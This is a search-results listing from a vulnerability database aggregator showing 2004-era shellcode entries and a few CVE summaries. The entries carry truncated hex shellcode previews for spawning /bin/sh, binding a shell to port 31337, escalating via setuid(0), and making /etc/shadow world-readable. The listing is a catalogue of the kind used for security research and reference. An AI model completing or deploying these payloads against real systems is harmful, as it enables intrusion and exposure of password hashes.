Lucene search
K

1131 matches found

seebug.org
seebug.org
added 2004/12/22 12:0 a.m.20 views

linux/x86 Magic Byte Self Modifying Code 76 bytes

No description provided by source. /-------------------------------------------------------/ / Magic Byte Self Modifying Code for surviving / / toupper & tolower / / 76bytes execve exit code by XORt / /-------------------------------------------------------/ "\xeb\x34" / jmp $0x34 revert / "\x5e"...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/12/22 12:0 a.m.13 views

linux/x86 Radically Self Modifying Code 70 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 Radically Self Modifying Code 70 bytes ================================================ /-------------------------------------------------------/ / Radically Self Modifying Code for...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/12/22 12:0 a.m.26 views

linux/x86 Magic Byte Self Modifying Code 76 bytes

linux/x86 Magic Byte Self Modifying Code 76 bytes. Shellcode exploit for linx86 platform /-------------------------------------------------------/ / Magic Byte Self Modifying Code for surviving / / toupper & tolower / / 76bytes execve exit code by XORt /...

0.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/12/22 12:0 a.m.19 views

linux/x86 Radically Self Modifying Code 70 bytes

linux/x86 Radically Self Modifying Code 70 bytes. Shellcode exploit for linx86 platform /-------------------------------------------------------/ / Radically Self Modifying Code for surviving / / toupper and tolower / / / / 70byte execve & exit code by XORt /...

0.6AI score
Exploits0
NVD
NVD
added 2004/12/06 5:0 a.m.17 views

CVE-2004-0618

FreeBSD 5.1 for the Alpha processor allows local users to cause a denial of service crash via an execve system call with an unaligned memory address as an argument...

2.1CVSS6.3AI score0.00421EPSS
Exploits1References3
CVE
CVE
added 2004/12/01 5:0 a.m.88 views

CVE-2004-1073

The CVE-2004-1073 entry affects the Linux kernel (2.4.x up to 2.4.27 and 2.6.x up to 2.6.8). It is caused by the open_exec path of the execve functionality (exec.c), where the interpreter (PT_INTERP) handling can allow local users to read non-readable ELF binaries. The description specifies local...

2.1CVSS7AI score0.0033EPSS
Exploits0References21Affected Software8
0day.today
0day.today
added 2004/11/15 12:0 a.m.17 views

linux/x86 execve("/bin/ash",0,0); 21 bytes

Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve"/bin/ash",0,0; 21 bytes ========================================== / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include include char...

7AI score
Exploits0
0day.today
0day.today
added 2004/11/15 12:0 a.m.23 views

linux/x86 execve code 23 bytes

Exploit for linux/x86 platform in category shellcode ============================== linux/x86 execve code 23 bytes ============================== / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/11/15 12:0 a.m.8 views

linux/x86 execve code 23 bytes

No description provided by source. / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f / "\x89\xe3" / mov %esp,%ebx / "\x52" / push...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2004/11/12 12:0 a.m.43 views

binfmt_elf.txt

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Synopsis: Linux kernel binfmtelf loader vulnerabilities Product: Linux kernel Version: 2.4 up to to and including 2.4.27, 2.6 up to to and including 2.6.8 Vendor: http://www.kernel.org/ URL: http://isec.pl/vulnerabilities/isec-0017-binfmtelf.txt CVE:...

7.4AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.21 views

netbsd/x86 execve /bin/sh 68 bytes

Exploit for netbsd/x86 platform in category shellcode ================================== netbsd/x86 execve /bin/sh 68 bytes ================================== / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07"...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.22 views

linux/x86 chmod 666 /etc/shadow 82 bytes

linux/x86 chmod 666 /etc/shadow 82 bytes. Shellcode exploit for linx86 platform / [email protected] Usando execve y un array de punteros include main char name4; name0="/bin/chmod"; name1="666"; name2="/etc/shadow"; name3=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x31" /...

Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.35 views

freebsd/x86 - execve /bin/sh 37 bytes

freebsd/x86 execve /bin/sh 37 bytes. Shellcode exploit for freebsdx86 platform / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator preedatoratsendmaildotru / char FreeBSDcode=...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.18 views

bsd/x86 execve /bin/sh setuid (0) 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.22 views

linux/x86 execve /bin/sh IA32 0xff-less 45 bytes

linux/x86 execve /bin/sh IA32 0xff-less 45 bytes. Shellcode exploit for linx86 platform / 0xff-less execve /bin/sh by anathema / include include unsigned char code = / Linux/IA32 0xff-less execve shellcode. / "\x89\xe6" / movl %esp, %esi / "\x83\xc6\x30" / addl $0x30, %esi / "\xb8\x2e\x62\x69\x6e...

7.4AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.12 views

linux/x86 execve /bin/sh IA32 0xff-less 45 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 execve /bin/sh IA32 0xff-less 45 bytes ================================================ / 0xff-less execve /bin/sh by anathema / include include unsigned char code = / Linux/IA32...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.42 views

linux/x86 execve /bin/sh alphanumeric 392 bytes

linux/x86 execve /bin/sh alphanumeric 392 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY"...

0.4AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.19 views

bsdi/x86 execve /bin/sh 46 bytes

No description provided by source. / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/26 12:0 a.m.21 views

bsd/x86 portbind port 31337 83 bytes

No description provided by source. / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx "\x6a\x01" // pushl $0x01 "\x6a\x02" // pushl $0x02 "\xb0\x61" // movb $0x61,%al "\x50" // pushl %eax "\xcd\x80" // int $0x80 "\x52" ...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.33 views

bsdi/x86 execve /bin/sh 46 bytes

Exploit for bsdi/x86 platform in category shellcode ================================ bsdi/x86 execve /bin/sh 46 bytes ================================ / BSDi execve of /bin/sh by v9 email protected / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. /...

7AI score
Exploits0
Rows per page
Query Builder